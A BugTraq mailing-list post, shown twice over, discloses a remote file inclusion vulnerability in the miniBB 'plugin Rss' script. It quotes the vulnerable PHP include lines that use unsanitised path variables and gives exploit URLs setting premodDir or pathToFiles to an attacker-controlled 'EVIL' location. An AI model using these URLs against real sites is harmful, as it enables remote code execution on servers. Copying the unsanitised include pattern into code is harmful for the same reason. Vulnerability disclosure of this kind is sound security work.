BugTraq
Back to list
|
Post reply
plugin Rss Remote File Inclusion Vulnerability
Jul 29 2008 05:04AM
Ghost hacker (ghost-r00t hotmail com)
########################################################################
##########################
plugin Rss Remote File Inclusion Vulnerability
Ghost Hacker, http://gh0st10.wordpress.com
|, .-. .-. ,|
| )(_o/ \o_)( | R-H team
|/ /\ \|
########################################################################
##########################
[~] Found by : Ghost Hacker
[~] HomePage : real-hack.net
[~] Email : Ghost-r00t (at) Hotmail (dot) com [email concealed]
[~] Name Script : plugin Rss
[~] Download Script : http://www.minibb.com/download.php?file=minibb_plugin_rss
########################################################################
##########################
[~] Error :
include ($pathToFiles.'setup_mysql.php');
include ($pathToFiles.'bb_functions.php');
include($premodDir.'premoder_posts.php');
include($premodDir.'premoder_topics.php');
[~] Exploit :
http://xxxx/rss.php?premodDir=EVIL
http://xxxx/rss.php?pathToFiles=EVIL
########################################################################
##########################
[~] Greetz :
PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & L&J Team & Root Hacker ..
Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope
All Members Real Hack And All My Friends ..
########################################################################
##########################
Found by : Ghost Hacker [ R-H TeaM ]
########################################################################
##########################
hi str0ke
HomePage plugin Rss http://www.minibb.com
s33 y0u :) ,
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
########################################################################
##########################
plugin Rss Remote File Inclusion Vulnerability
Ghost Hacker, http://gh0st10.wordpress.com
|, .-. .-. ,|
| )(_o/ \o_)( | R-H team
|/ /\ \|
########################################################################
##########################
[~] Found by : Ghost Hacker
[~] HomePage : real-hack.net
[~] Email : Ghost-r00t (at) Hotmail (dot) com [email concealed]
[~] Name Script : plugin Rss
[~] Download Script : http://www.minibb.com/download.php?file=minibb_plugin_rss
########################################################################
##########################
[~] Error :
include ($pathToFiles.'setup_mysql.php');
include ($pathToFiles.'bb_functions.php');
include($premodDir.'premoder_posts.php');
include($premodDir.'premoder_topics.php');
[~] Exploit :
http://xxxx/rss.php?premodDir=EVIL
http://xxxx/rss.php?pathToFiles=EVIL
########################################################################
##########################
[~] Greetz :
PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & L&J Team & Root Hacker ..
Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope
All Members Real Hack And All My Friends ..
########################################################################
##########################
Found by : Ghost Hacker [ R-H TeaM ]
########################################################################
##########################
hi str0ke
HomePage plugin Rss http://www.minibb.com
s33 y0u :) ,
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ reply ]